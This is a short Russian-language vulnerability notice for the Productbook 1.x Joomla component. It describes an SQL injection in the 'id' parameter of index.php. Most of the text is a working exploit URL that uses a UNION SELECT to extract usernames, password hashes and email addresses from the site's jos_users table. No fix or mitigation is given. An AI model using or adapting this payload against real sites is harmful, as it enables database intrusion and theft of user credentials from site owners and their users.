Программа: Productbook 1.x (component for Joomla)
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "id" сценарием index.php (когда "option"
установлен в "com_productbook"). Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.
Эксплоит:
http://server/index.php?option=com_productbook&Itemid=97&func=detail&id=
-73+UNION all SELECT
1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,
13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,
36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,
56,57,58+from+condev.jos_users--
